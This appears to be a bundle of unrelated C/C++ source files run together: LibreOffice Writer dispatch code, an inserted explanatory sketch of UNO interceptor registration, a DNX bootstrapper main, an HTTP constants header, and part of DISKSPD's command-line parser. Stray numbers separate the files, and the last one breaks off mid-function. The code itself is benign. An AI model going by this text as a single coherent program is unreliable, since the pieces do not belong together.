---------------------------------------------------------------------------*/ const uno::Sequence< sal_Int8 > & SwXDispatchProviderInterceptor::getUnoTunnelId() { static uno::Sequence< sal_Int8 > aSeq = ::CreateUnoTunnelId(); return aSeq; } /* -----------------------------01.10.2001 14:31------------------------------ ---------------------------------------------------------------------------*/ sal_Int64 SwXDispatchProviderInterceptor::getSomething( const uno::Sequence< sal_Int8 >& aIdentifier ) throw(uno::RuntimeException) { if( aIdentifier.getLength() == 16 && 0 == rtl_compareMemory( getUnoTunnelId().getConstArray(), aIdentifier.getConstArray(), 16 ) ) { return sal::static_int_cast< sal_Int64 >( reinterpret_cast< sal_IntPtr >( this )); } return 0; } /* -----------------------------01.10.2001 14:32------------------------------ ---------------------------------------------------------------------------*/ void SwXDispatchProviderInterceptor::Invalidate() { DispatchMutexLock_Impl aLock(*this); if (m_xIntercepted.is()) { m_xIntercepted->releaseDispatchProviderInterceptor((frame::XDispatchProviderInterceptor*)this); uno::Reference< lang::XComponent> xInterceptedComponent(m_xIntercepted, uno::UNO_QUERY); if (xInterceptedComponent.is()) xInterceptedComponent->removeEventListener((lang::XEventListener*)this); m_xDispatch = 0; } m_xIntercepted = NULL; m_pView = 0; } /* -----------------------------07.11.00 14:26-------------------------------- ---------------------------------------------------------------------------*/ SwXDispatch::SwXDispatch(SwView& rVw) : m_pView(&rVw), m_bOldEnable(sal_False), m_bListenerAdded(sal_False) { } /*-- 07.11.00 14:26:13--------------------------------------------------- -----------------------------------------------------------------------*/ SwXDispatch::~SwXDispatch() { if(m_bListenerAdded && m_pView) { uno::Reference<view::XSelectionSupplier> xSupplier = m_pView->GetUNOObject(); uno::Reference<view::XSelectionChangeListener> xThis = this; xSupplier->removeSelectionChangeListener(xThis); } } /*-- 07.11.00 14:26:13--------------------------------------------------- -----------------------------------------------------------------------*/ void SwXDispatch::dispatch( const util::URL& aURL, const uno::Sequence< beans::PropertyValue >& aArgs ) throw(uno::RuntimeException) { if(!m_pView) throw uno::RuntimeException(); SwWrtShell& rSh = m_pView->GetWrtShell(); SwNewDBMgr* pNewDBMgr = rSh.GetNewDBMgr(); if(!aURL.Complete.compareToAscii(cURLInsertContent)) { ::svx::ODataAccessDescriptor aDescriptor(aArgs); SwMergeDescriptor aMergeDesc( DBMGR_MERGE, rSh, aDescriptor ); pNewDBMgr->MergeNew(aMergeDesc); } else if(!aURL.Complete.compareToAscii(cURLInsertColumns)) { pNewDBMgr->InsertText(rSh, aArgs); } else if(!aURL.Complete.compareToAscii(cURLFormLetter)) { SfxUsrAnyItem aDBProperties(FN_PARAM_DATABASE_PROPERTIES, uno::makeAny(aArgs)); m_pView->GetViewFrame()->GetDispatcher()->Execute( FN_MAILMERGE_WIZARD, SFX_CALLMODE_ASYNCHRON, &aDBProperties, 0L); // pNewDBMgr->ExecuteFormLetter(rSh, aArgs); } else if(!aURL.Complete.compareToAscii(cURLDocumentDataSource)) { OSL_ENSURE(sal_False, "SwXDispatch::dispatch: this URL is not to be dispatched!"); } else if(!aURL.Complete.compareToAscii(cInternalDBChangeNotification)) { frame::FeatureStateEvent aEvent; aEvent.IsEnabled = sal_True; aEvent.Source = *(cppu::OWeakObject*)this; const SwDBData& rData = m_pView->GetWrtShell().GetDBDesc(); ::svx::ODataAccessDescriptor aDescriptor; aDescriptor.setDataSource(rData.sDataSource); 
aDescriptor[::svx::daCommand] <<= rData.sCommand; aDescriptor[::svx::daCommandType] <<= rData.nCommandType; aEvent.State <<= aDescriptor.createPropertyValueSequence(); aEvent.IsEnabled = rData.sDataSource.getLength() > 0; StatusListenerList::iterator aListIter = m_aListenerList.begin(); for(aListIter = m_aListenerList.begin(); aListIter != m_aListenerList.end(); ++aListIter) { StatusStruct_Impl aStatus = *aListIter; if(!aStatus.aURL.Complete.compareToAscii(cURLDocumentDataSource)) { aEvent.FeatureURL = aStatus.aURL; aStatus.xListener->statusChanged( aEvent ); } } } else throw uno::RuntimeException(); } /*-- 07.11.00 14:26:13--------------------------------------------------- -----------------------------------------------------------------------*/ void SwXDispatch::addStatusListener( const uno::Reference< frame::XStatusListener >& xControl, const util::URL& aURL ) throw(uno::RuntimeException) { if(!m_pView) throw uno::RuntimeException(); ShellModes eMode = m_pView->GetShellMode(); sal_Bool bEnable = SHELL_MODE_TEXT == eMode || SHELL_MODE_LIST_TEXT == eMode || SHELL_MODE_TABLE_TEXT == eMode || SHELL_MODE_TABLE_LIST_TEXT == eMode; m_bOldEnable = bEnable; frame::FeatureStateEvent aEvent; aEvent.IsEnabled = bEnable; aEvent.Source = *(cppu::OWeakObject*)this; aEvent.FeatureURL = aURL; // one of the URLs requires a special state .... if (!aURL.Complete.compareToAscii(cURLDocumentDataSource)) { const SwDBData& rData = m_pView->GetWrtShell().GetDBDesc(); ::svx::ODataAccessDescriptor aDescriptor; aDescriptor.setDataSource(rData.sDataSource); aDescriptor[::svx::daCommand] <<= rData.sCommand; aDescriptor[::svx::daCommandType] <<= rData.nCommandType; aEvent.State <<= aDescriptor.createPropertyValueSequence(); aEvent.IsEnabled = rData.sDataSource.getLength() > 0; } xControl->statusChanged( aEvent ); StatusListenerList::iterator aListIter = m_aListenerList.begin(); StatusStruct_Impl aStatus; aStatus.xListener = xControl; aStatus.aURL = aURL; m_aListenerList.insert(aListIter, aStatus); if(!m_bListenerAdded) { uno::Reference<view::XSelectionSupplier> xSupplier = m_pView->GetUNOObject(); uno::Reference<view::XSelectionChangeListener> xThis = this; xSupplier->addSelectionChangeListener(xThis); m_bListenerAdded = sal_True; } } /*-- 07.11.00 14:26:15--------------------------------------------------- -----------------------------------------------------------------------*/ void SwXDispatch::removeStatusListener( const uno::Reference< frame::XStatusListener >& xControl, const util::URL& ) throw(uno::RuntimeException) { StatusListenerList::iterator aListIter = m_aListenerList.begin(); for(aListIter = m_aListenerList.begin(); aListIter != m_aListenerList.end(); ++aListIter) { StatusStruct_Impl aStatus = *aListIter; if(aStatus.xListener.get() == xControl.get()) { m_aListenerList.erase(aListIter); break; } } if(m_aListenerList.empty() && m_pView) { uno::Reference<view::XSelectionSupplier> xSupplier = m_pView->GetUNOObject(); uno::Reference<view::XSelectionChangeListener> xThis = this; xSupplier->removeSelectionChangeListener(xThis); m_bListenerAdded = sal_False; } } /* -----------------------------07.03.01 10:27-------------------------------- ---------------------------------------------------------------------------*/ void SwXDispatch::selectionChanged( const lang::EventObject& ) throw(uno::RuntimeException) { ShellModes eMode = m_pView->GetShellMode(); sal_Bool bEnable = SHELL_MODE_TEXT == eMode || SHELL_MODE_LIST_TEXT == eMode || SHELL_MODE_TABLE_TEXT == eMode || SHELL_MODE_TABLE_LIST_TEXT == eMode; if(bEnable 
!= m_bOldEnable) { m_bOldEnable = bEnable; frame::FeatureStateEvent aEvent; aEvent.IsEnabled = bEnable; aEvent.Source = *(cppu::OWeakObject*)this; StatusListenerList::iterator aListIter = m_aListenerList.begin(); for(aListIter = m_aListenerList.begin(); aListIter != m_aListenerList.end(); ++aListIter) { StatusStruct_Impl aStatus = *aListIter; aEvent.FeatureURL = aStatus.aURL; if (0 != aStatus.aURL.Complete.compareToAscii(cURLDocumentDataSource)) // the document's data source does not depend on the selection, so it's state does not change here aStatus.xListener->statusChanged( aEvent ); } } } /* -----------------------------07.03.01 10:46-------------------------------- ---------------------------------------------------------------------------*/ void SwXDispatch::disposing( const lang::EventObject& rSource ) throw(uno::RuntimeException) { uno::Reference<view::XSelectionSupplier> xSupplier(rSource.Source, uno::UNO_QUERY); uno::Reference<view::XSelectionChangeListener> xThis = this; xSupplier->removeSelectionChangeListener(xThis); m_bListenerAdded = sal_False; lang::EventObject aObject; aObject.Source = (cppu::OWeakObject*)this; StatusListenerList::iterator aListIter = m_aListenerList.begin(); for(; aListIter != m_aListenerList.end(); ++aListIter) { StatusStruct_Impl aStatus = *aListIter; aStatus.xListener->disposing(aObject); } m_pView = 0; } /* -----------------------------12.07.01 13:30-------------------------------- ---------------------------------------------------------------------------*/ const sal_Char* SwXDispatch::GetDBChangeURL() { return cInternalDBChangeNotification; } /* -----------------------------09.09.2002 08:48------------------------------ ---------------------------------------------------------------------------*/ SwXDispatchProviderInterceptor::DispatchMutexLock_Impl::DispatchMutexLock_Impl( SwXDispatchProviderInterceptor& ) : // aGuard(rInterceptor.m_aMutex) #102295# solar mutex has to be used currently aGuard(Application::GetSolarMutex()) { } /* -----------------------------09.09.2002 08:48------------------------------ ---------------------------------------------------------------------------*/ SwXDispatchProviderInterceptor::DispatchMutexLock_Impl::~DispatchMutexLock_Impl() { }
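Illustrative note, not part of the Writer sources above: the interceptor only releases itself from the frame in disposing()/Invalidate(); the matching registration happens elsewhere through the standard UNO interception interface. A minimal sketch of that registration, assuming the usual ::com::sun::star namespace aliases already used in this file and an xFrame/xInterceptor pair supplied by the surrounding view code, could look like this:

// Hedged sketch only: how a dispatch-provider interceptor is typically hooked
// into a frame via css::frame::XDispatchProviderInterception. The xFrame and
// xInterceptor references are assumed to come from the caller.
#include <com/sun/star/frame/XFrame.hpp>
#include <com/sun/star/frame/XDispatchProviderInterceptor.hpp>
#include <com/sun/star/frame/XDispatchProviderInterception.hpp>

void lcl_HookInterceptor(
        const uno::Reference< frame::XFrame >& xFrame,
        const uno::Reference< frame::XDispatchProviderInterceptor >& xInterceptor)
{
    uno::Reference< frame::XDispatchProviderInterception > xInterception(xFrame, uno::UNO_QUERY);
    if (xInterception.is())
    {
        // The interception service chains the interceptor in by calling its
        // setMasterDispatchProvider()/setSlaveDispatchProvider() methods.
        xInterception->registerDispatchProviderInterceptor(xInterceptor);
    }
    // Later, symmetric to the release call seen in disposing()/Invalidate():
    //     xInterception->releaseDispatchProviderInterceptor(xInterceptor);
}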
6,122
798
// Copyright (c) .NET Foundation. All rights reserved. // Licensed under the Apache License, Version 2.0. See License.txt in the project root for license information. #include "stdafx.h" #include "pal.h" #include "utils.h" int CallApplicationProcessMain(int argc, dnx::char_t* argv[], dnx::trace_writer& trace_writer); void FreeExpandedCommandLineArguments(size_t argc, dnx::char_t** ppszArgv); bool ExpandCommandLineArguments(int argc, dnx::char_t** ppszArgv, size_t& expanded_argc, dnx::char_t**& ppszExpandedArgv); #if defined(ARM) int wmain(int argc, wchar_t* argv[]) #elif defined(PLATFORM_UNIX) int main(int argc, char* argv[]) #else extern "C" int __stdcall DnxMain(int argc, wchar_t* argv[]) #endif { // Check for the debug flag before doing anything else dnx::utils::wait_for_debugger(argc - 1, const_cast<const dnx::char_t**>(&(argv[1])), _X("--bootstrapper-debug")); size_t nExpandedArgc = 0; dnx::char_t** ppszExpandedArgv = nullptr; auto expanded = ExpandCommandLineArguments(argc - 1, &(argv[1]), nExpandedArgc, ppszExpandedArgv); auto trace_writer = dnx::trace_writer{ IsTracingEnabled() }; if (!expanded) { return CallApplicationProcessMain(argc - 1, &argv[1], trace_writer); } auto exitCode = CallApplicationProcessMain(static_cast<int>(nExpandedArgc), ppszExpandedArgv, trace_writer); FreeExpandedCommandLineArguments(nExpandedArgc, ppszExpandedArgv); return exitCode; }
563
368
/**
 * @file    http_global.h
 * @brief   HTTP global data definitions
 * @author  xiangwangfeng <<EMAIL>>
 * @date    2011-4-24
 * @website www.xiangwangfeng.com
 */
#pragma once
#include "global_defs.h"

const char kget[] = "GET";
const char kpost[] = "POST";
const char kaccept[] = "Accept";
const char kconnection[] = "Connection";
const char kcontent_type[] = "Content-Type";
const char kcontent_length[] = "Content-Length";

NAMESPACE_BEGIN(Http)

// HTTP transport error codes
enum HTTPERROR
{
	HTTPERROR_SUCCESS,   // success
	HTTPERROR_INVALID,   // the HTTP object has been discarded (no longer valid)
	HTTPERROR_CONNECT,   // connection failed
	HTTPERROR_TRANSPORT, // transfer failed
	HTTPERROR_IO,        // I/O error
	HTTPERROR_PARAMETER  // invalid parameter
};

NAMESPACE_END(Http)
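The header above only supplies request-method and header-name string constants plus an error-code enum. As a quick illustration (not part of the original project), a request header block might be assembled from those constants roughly as in the sketch below; the function name, host, path and content type are made up for the example.

// Illustrative sketch only: build an HTTP/1.1 POST header from the constants
// defined in http_global.h. Assumes that header is on the include path.
#include <sstream>
#include <string>
#include "http_global.h"

std::string BuildPostHeader(const std::string& host,
                            const std::string& path,
                            size_t body_length)
{
    std::ostringstream oss;
    oss << kpost << " " << path << " HTTP/1.1\r\n"
        << "Host: " << host << "\r\n"
        << kaccept << ": */*\r\n"
        << kconnection << ": keep-alive\r\n"
        << kcontent_type << ": application/x-www-form-urlencoded\r\n"
        << kcontent_length << ": " << body_length << "\r\n"
        << "\r\n";
    return oss.str();
}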
370
430
/* DISKSPD Copyright(c) Microsoft Corporation All rights reserved. MIT License Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. */ #include "CmdLineParser.h" #include "Common.h" #include "XmlProfileParser.h" #include <assert.h> #include <stdio.h> #include <stdlib.h> CmdLineParser::CmdLineParser() : _dwBlockSize(64 * 1024), _ulWriteRatio(0), _hEventStarted(nullptr), _hEventFinished(nullptr) { } CmdLineParser::~CmdLineParser() { } // Get size in bytes from a string (KMGTb) bool CmdLineParser::_GetSizeInBytes(const char *pszSize, UINT64& ullSize, const char **pszRest) const { bool fOk = true; UINT64 ullResult = 0; UINT64 ullMultiplier = 1; const char *rest = nullptr; fOk = Util::ParseUInt(pszSize, ullResult, rest); if (fOk) { char ch = static_cast<char>(toupper(*rest)); switch (ch) { case '\0': { break; } case 'T': { ullMultiplier *= 1024; } case 'G': { ullMultiplier *= 1024; } case 'M': { ullMultiplier *= 1024; } case 'K': { ullMultiplier *= 1024; ++rest; break; } case 'B': { ullMultiplier = _dwBlockSize; ++rest; break; } default: { // // If caller is not expecting continuation, we know this is malformed now and // can say so with respect to size specifiers. // If there is continuation, caller is responsible for validating. // if (!pszRest) { fOk = false; fprintf(stderr, "Invalid size '%c'. Valid: K - KiB, M - MiB, G - GiB, T - TiB, B - block\n", *rest); } } } if (fOk) { // // Second chance after parsing valid size qualifier. // if (!pszRest && *rest != '\0') { fOk = false; fprintf(stderr, "Unrecognized characters after size specification\n"); } // // Now apply size specifier. // else if (ullResult <= MAXUINT64 / ullMultiplier) { ullResult *= ullMultiplier; } else { // overflow fOk = false; fprintf(stderr, "Overflow applying multipler '%c'\n", ch); } } } else { fprintf(stderr, "Invalid integer\n"); } if (fOk) { ullSize = ullResult; if (pszRest) { *pszRest = rest; } } return fOk; } bool CmdLineParser::_GetRandomDataWriteBufferData(const string& sArg, UINT64& cb, string& sPath) { bool fOk = true; size_t iComma = sArg.find(','); if (iComma == sArg.npos) { fOk = _GetSizeInBytes(sArg.c_str(), cb, nullptr); sPath = ""; } else { fOk = _GetSizeInBytes(sArg.substr(0, iComma).c_str(), cb, nullptr); sPath = sArg.substr(iComma + 1); } return fOk; } void CmdLineParser::_DisplayUsageInfo(const char *pszFilename) const { // ISSUE-REVIEW: this formats badly in the default 80 column command prompt printf("\n"); printf("Usage: %s [options] target1 [ target2 [ target3 ...] 
]\n", pszFilename); printf("version %s (%s)\n", DISKSPD_NUMERIC_VERSION_STRING, DISKSPD_DATE_VERSION_STRING); printf("\n"); printf( "Valid targets:\n" " file_path\n" " #<physical drive number>\n" " <drive_letter>:\n" "\n" "Available options:\n" " -? display usage information\n" " -ag group affinity - affinitize threads round-robin to cores in Processor Groups 0 - n.\n" " Group 0 is filled before Group 1, and so forth.\n" " [default; use -n to disable default affinity]\n" " -ag#,#[,#,...]> advanced CPU affinity - affinitize threads round-robin to the CPUs provided. The g# notation\n" " specifies Processor Groups for the following CPU core #s. Multiple Processor Groups\n" " may be specified, and groups/cores may be repeated. If no group is specified, 0 is assumed.\n" " Additional groups/processors may be added, comma separated, or on separate parameters.\n" " Examples: -a0,1,2 and -ag0,0,1,2 are equivalent.\n" " -ag0,0,1,2,g1,0,1,2 specifies the first three cores in groups 0 and 1.\n" " -ag0,0,1,2 -ag1,0,1,2 is equivalent.\n" " -b<size>[KMGT] block size in bytes or KiB/MiB/GiB/TiB [default=64K]\n" " -B<offs>[KMGTb] base target offset in bytes or KiB/MiB/GiB/TiB/blocks [default=0]\n" " (offset from the beginning of the file)\n" " -c<size>[KMGTb] create files of the given size.\n" " Size can be stated in bytes or KiB/MiB/GiB/TiB/blocks\n" " -C<seconds> cool down time - duration of the test after measurements finished [default=0s].\n" " -D<milliseconds> Capture IOPs statistics in intervals of <milliseconds>; these are per-thread\n" " per-target: text output provides IOPs standard deviation, XML provides the full\n" " IOPs time series in addition. [default=1000, 1 second].\n" " -d<seconds> duration (in seconds) to run test [default=10s]\n" " -f<size>[KMGTb] target size - use only the first <size> bytes or KiB/MiB/GiB/TiB/blocks of the file/disk/partition,\n" " for example to test only the first sectors of a disk\n" " -f<rst> open file with one or more additional access hints\n" " r : the FILE_FLAG_RANDOM_ACCESS hint\n" " s : the FILE_FLAG_SEQUENTIAL_SCAN hint\n" " t : the FILE_ATTRIBUTE_TEMPORARY hint\n" " [default: none]\n" " -F<count> total number of threads (conflicts with -t)\n" " -g<value>[i] throughput per-thread per-target throttled to given value; defaults to bytes per millisecond\n" " With the optional i qualifier the value is IOPS of the specified block size (-b).\n" " Throughput limits cannot be specified when using completion routines (-x)\n" " [default: no limit]\n" " -h deprecated, see -Sh\n" " -i<count> number of IOs per burst; see -j [default: inactive]\n" " -j<milliseconds> interval in <milliseconds> between issuing IO bursts; see -i [default: inactive]\n" " -I<priority> Set IO priority to <priority>. 
Available values are: 1-very low, 2-low, 3-normal (default)\n" " -l Use large pages for IO buffers\n" " -L measure latency statistics\n" " -n disable default affinity (-a)\n" " -N<vni> specify the flush mode for memory mapped I/O\n" " v : uses the FlushViewOfFile API\n" " n : uses the RtlFlushNonVolatileMemory API\n" " i : uses RtlFlushNonVolatileMemory without waiting for the flush to drain\n" " [default: none]\n" " -o<count> number of outstanding I/O requests per target per thread\n" " (1=synchronous I/O, unless more than 1 thread is specified with -F)\n" " [default=2]\n" " -O<count> number of outstanding I/O requests per thread - for use with -F\n" " (1=synchronous I/O)\n" " -p start parallel sequential I/O operations with the same offset\n" " (ignored if -r is specified, makes sense only with -o2 or greater)\n" " -P<count> enable printing a progress dot after each <count> [default=65536]\n" " completed I/O operations, counted separately by each thread \n" " -r[align[KMGTb]] random I/O aligned to <align> in bytes/KiB/MiB/GiB/TiB/blocks (overrides -s)\n" " [default alignment=block size (-b)]\n" " -rd<dist>[params] specify an non-uniform distribution for random IO in the target\n" " [default uniformly random]\n" " distributions: pct, abs\n" " all: IO%% and %%Target/Size are cumulative. If the sum of IO%% is less than 100%% the\n" " remainder is applied to the remainder of the target. An IO%% of 0 indicates a gap -\n" " no IO will be issued to that range of the target.\n" " pct : parameter is a combination of IO%%/%%Target separated by : (colon)\n" " Example: -rdpct90/10:0/10:5/20 specifies 90%% of IO in 10%% of the target, no IO\n" " next 10%%, 5%% IO in the next 20%% and the remaining 5%% of IO in the last 60%%\n" " abs : parameter is a combination of IO%%/Target Size separated by : (colon)\n" " If the actual target size is smaller than the distribution, the relative values of IO%%\n" " for the valid elements define the effective distribution.\n" " Example: -rdabs90/10G:0/10G:5/20G specifies 90%% of IO in 10GiB of the target, no IO\n" " next 10GiB, 5%% IO in the next 20GiB and the remaining 5%% of IO in the remaining\n" " capacity of the target. If the target is only 20G, the distribution truncates at\n" " 90/10G:0:10G and all IO is directed to the first 10G (equivalent to -f10G).\n" " -rs<percentage> percentage of requests which should be issued randomly. When used, -r may be used to\n" " specify IO alignment (applies to both the random and sequential portions of the load).\n" " Sequential IO runs will be homogeneous if a mixed ratio is specified (-w), and run\n" " lengths will follow a geometric distribution based on the percentage split.\n" " -R[p]<text|xml> output format. 
With the p prefix, the input profile (command line or XML) is validated and\n" " re-output in the specified format without running load, useful for checking or building\n" " complex profiles.\n" " [default: text]\n" " -s[i][align[KMGTb]] stride size of <align> in bytes/KiB/MiB/GiB/TiB/blocks, alignment/offset between operations\n" " [default=non-interlocked, default alignment=block size (-b)]\n" " By default threads track independent sequential IO offsets starting at offset 0 of the target.\n" " With multiple threads this results in threads overlapping their IOs - see -T to divide\n" " them into multiple separate sequential streams on the target.\n" " With the optional i qualifier (-si) threads interlock on a shared sequential offset.\n" " Interlocked operations may introduce overhead but make it possible to issue a single\n" " sequential stream to a target which responds faster than a one thread can drive.\n" " (ignored if -r specified, -si conflicts with -p, -rs and -T)\n" " -S[bhmruw] control caching behavior [default: caching is enabled, no writethrough]\n" " non-conflicting flags may be combined in any order; ex: -Sbw, -Suw, -Swu\n" " -S equivalent to -Su\n" " -Sb enable caching (default, explicitly stated)\n" " -Sh equivalent -Suw\n" " -Sm enable memory mapped I/O\n" " -Su disable software caching, equivalent to FILE_FLAG_NO_BUFFERING\n" " -Sr disable local caching, with remote sw caching enabled; only valid for remote filesystems\n" " -Sw enable writethrough (no hardware write caching), equivalent to FILE_FLAG_WRITE_THROUGH or\n" " non-temporal writes for memory mapped I/O (-Sm)\n" " -t<count> number of threads per target (conflicts with -F)\n" " -T<offs>[KMGTb] starting stride between I/O operations performed on the same target by different threads\n" " [default=0] (starting offset = base file offset + (thread number * <offs>)\n" " only applies with #threads > 1\n" " -v verbose mode\n" " -w<percentage> percentage of write requests (-w and -w0 are equivalent and result in a read-only workload).\n" " absence of this switch indicates 100%% reads\n" " IMPORTANT: a write test will destroy existing data without a warning\n" " -W<seconds> warm up time - duration of the test before measurements start [default=5s]\n" " -x use completion routines instead of I/O Completion Ports\n" " -X<filepath> use an XML file to configure the workload. 
Combine with -R, -v and -z to override profile defaults.\n" " Targets can be defined in XML profiles as template paths of the form *<integer> (*1, *2, ...).\n" " When run, specify the paths to substitute for the template paths in order on the command line.\n" " The first specified target is *1, second is *2, and so on.\n" " Example: diskspd -Xprof.xml first.bin second.bin (prof.xml using *1 and *2)\n" " -z[seed] set random seed [with no -z, seed=0; with plain -z, seed is based on system run time]\n" "\n" "Write buffers:\n" " -Z zero buffers used for write tests\n" " -Zr per IO random buffers used for write tests - this incurrs additional run-time\n" " overhead to create random content and shouln't be compared to results run\n" " without -Zr\n" " -Z<size>[KMGb] use a <size> buffer filled with random data as a source for write operations.\n" " -Z<size>[KMGb],<file> use a <size> buffer filled with data from <file> as a source for write operations.\n" "\n" " By default, the write buffers are filled with a repeating pattern (0, 1, 2, ..., 255, 0, 1, ...)\n" "\n" "Synchronization:\n" " -ys<eventname> signals event <eventname> before starting the actual run (no warmup)\n" " (creates a notification event if <eventname> does not exist)\n" " -yf<eventname> signals event <eventname> after the actual run finishes (no cooldown)\n" " (creates a notification event if <eventname> does not exist)\n" " -yr<eventname> waits on event <eventname> before starting the run (including warmup)\n" " (creates a notification event if <eventname> does not exist)\n" " -yp<eventname> stops the run when event <eventname> is set; CTRL+C is bound to this event\n" " (creates a notification event if <eventname> does not exist)\n" " -ye<eventname> sets event <eventname> and quits\n" "\n" "Event Tracing:\n" " -e<q|c|s> Use query perf timer (qpc), cycle count, or system timer respectively.\n" " [default = q, query perf timer (qpc)]\n" " -ep use paged memory for the NT Kernel Logger [default=non-paged memory]\n" " -ePROCESS process start & end\n" " -eTHREAD thread start & end\n" " -eIMAGE_LOAD image load\n" " -eDISK_IO physical disk IO\n" " -eMEMORY_PAGE_FAULTS all page faults\n" " -eMEMORY_HARD_FAULTS hard faults only\n" " -eNETWORK TCP/IP, UDP/IP send & receive\n" " -eREGISTRY registry calls\n" "\n\n"); printf("Examples:\n\n"); printf("Create 8192KB file and run read test on it for 1 second:\n\n"); printf(" %s -c8192K -d1 testfile.dat\n", pszFilename); printf("\n"); printf("Set block size to 4KB, create 2 threads per file, 32 overlapped (outstanding)\n"); printf("I/O operations per thread, disable all caching mechanisms and run block-aligned random\n"); printf("access read test lasting 10 seconds:\n\n"); printf(" %s -b4K -t2 -r -o32 -d10 -Sh testfile.dat\n\n", pszFilename); printf("Create two 1GB files, set block size to 4KB, create 2 threads per file, affinitize threads\n"); printf("to CPUs 0 and 1 (each file will have threads affinitized to both CPUs) and run read test\n"); printf("lasting 10 seconds:\n\n"); printf(" %s -c1G -b4K -t2 -d10 -a0,1 testfile1.dat testfile2.dat\n", pszFilename); printf("\n"); } bool CmdLineParser::_ParseETWParameter(const char *arg, Profile *pProfile) { assert(nullptr != arg); assert(0 != *arg); bool fOk = true; pProfile->SetEtwEnabled(true); if (*(arg + 1) != '\0') { const char *c = arg + 1; if (*c == 'p') { pProfile->SetEtwUsePagedMemory(true); } else if (*c == 'q') { pProfile->SetEtwUsePerfTimer(true); } else if (*c == 's') { pProfile->SetEtwUseSystemTimer(true); //default } else if (*c == 'c') 
{ pProfile->SetEtwUseCyclesCounter(true); } else if (strcmp(c, "PROCESS") == 0) //process start & end { pProfile->SetEtwProcess(true); } else if (strcmp(c, "THREAD") == 0) //thread start & end { pProfile->SetEtwThread(true); } else if (strcmp(c, "IMAGE_LOAD") == 0) //image load { pProfile->SetEtwImageLoad(true); } else if (strcmp(c, "DISK_IO") == 0) //physical disk IO { pProfile->SetEtwDiskIO(true); } else if (strcmp(c, "MEMORY_PAGE_FAULTS") == 0) //all page faults { pProfile->SetEtwMemoryPageFaults(true); } else if (strcmp(c, "MEMORY_HARD_FAULTS") == 0) //hard faults only { pProfile->SetEtwMemoryHardFaults(true); } else if (strcmp(c, "NETWORK") == 0) //tcpip send & receive { pProfile->SetEtwNetwork(true); } else if (strcmp(c, "REGISTRY") == 0) //registry calls { pProfile->SetEtwRegistry(true); } else { fOk = false; } } else { fOk = false; } return fOk; } bool CmdLineParser::_ParseAffinity(const char *arg, TimeSpan *pTimeSpan) { bool fOk = true; assert(nullptr != arg); assert('\0' != *arg); const char *c = arg + 1; // -a and -ag are functionally equivalent; group-aware affinity. // Note that group-aware affinity is default. // look for the -a simple case if (*c == '\0') { return true; } // look for the -ag simple case if (*c == 'g') { // peek ahead, done? if (*(c + 1) == '\0') { return true; } // leave the parser at the g; this is the start of a group number } // more complex affinity -ag0,0,1,2,g1,0,1,2,... OR -a0,1,2,.. // n counts the -a prefix, the first parsed character is string index 2 DWORD nGroup = 0, nNum = 0, n = 2; bool fGroup = false, fNum = false; while (*c != '\0') { if ((*c >= '0') && (*c <= '9')) { // accumulating a number fNum = true; nNum = 10 * nNum + (*c - '0'); } else if (*c == 'g') { // bad: ggggg if (fGroup) { fOk = false; } // now parsing a group number fGroup = true; } else if (*c == ',') { // separator; if parsing group and have a number, now have the group if (fGroup && fNum) { if (nNum > MAXWORD) { fprintf(stderr, "ERROR: group %u is out of range\n", nNum); fOk = false; } else { nGroup = nNum; nNum = 0; fGroup = false; } } // at a split but don't have a parsed number, error else if (!fNum) { fOk = false; } // have a parsed core number else { if (nNum > MAXBYTE) { fprintf(stderr, "ERROR: core %u is out of range\n", nNum); fOk = false; } else { pTimeSpan->AddAffinityAssignment((WORD)nGroup, (BYTE)nNum); nNum = 0; fNum = false; } } } else { fOk = false; } // bail out to error pretty print on error if (!fOk) { break; } c++; n++; } // if parsing a group or don't have a final number, error if (fGroup || !fNum) { fOk = false; } if (fOk && nNum > MAXBYTE) { fprintf(stderr, "ERROR: core %u is out of range\n", nNum); fOk = false; } if (!fOk) { // mid-parse error, show the point at which it occured if (*c != '\0') { fprintf(stderr, "ERROR: syntax error parsing affinity at highlighted character\n-%s\n", arg); while (n-- > 0) { fprintf(stderr, " "); } fprintf(stderr, "^\n"); } else { fprintf(stderr, "ERROR: incomplete affinity specification\n"); } } if (fOk) { // fprintf(stderr, "FINAL parsed group %d core %d\n", nGroup, nNum); pTimeSpan->AddAffinityAssignment((WORD)nGroup, (BYTE)nNum); } return fOk; } bool CmdLineParser::_ParseFlushParameter(const char *arg, MemoryMappedIoFlushMode *FlushMode) { assert(nullptr != arg); assert(0 != *arg); bool fOk = true; if (*(arg + 1) != '\0') { const char *c = arg + 1; if (_stricmp(c, "v") == 0) { *FlushMode = MemoryMappedIoFlushMode::ViewOfFile; } else if (_stricmp(c, "n") == 0) { *FlushMode = MemoryMappedIoFlushMode::NonVolatileMemory; 
} else if (_stricmp(c, "i") == 0) { *FlushMode = MemoryMappedIoFlushMode::NonVolatileMemoryNoDrain; } else { fOk = false; } } else { fOk = false; } return fOk; } bool CmdLineParser::_ParseRandomDistribution(const char *arg, vector<Target>& vTargets) { vector<DistributionRange> vOr; DistributionType dType; bool fOk = false; UINT32 pctAcc = 0, pctCur; // accumulated/cur pct io UINT64 targetAcc = 0, targetCur; // accumulated/cur target if (!strncmp(arg, "pct", 3)) { dType = DistributionType::Percent; } else if (strncmp(arg, "abs", 3)) { fprintf(stderr, "Unrecognized random distribution type\n"); return false; } else { dType = DistributionType::Absolute; } arg += 3; // // Parse pairs of // // * pct: percentage/target percentage // * abs: percentage/absolute range of target // // Ex: 90/10:5/5 => [0,90) -> [0, 10) :: [90, 95) -> [10, 15) // a remainder of [95, 100) -> [15, 100) would be applied. // // Percentages are cumulative and successively define the span of // the preceding definition. Absolute ranges are also cumulative: // 10/1G:90/1G puts 90% of accesses in the second 1G range of the // target. // // A single percentage can be 100 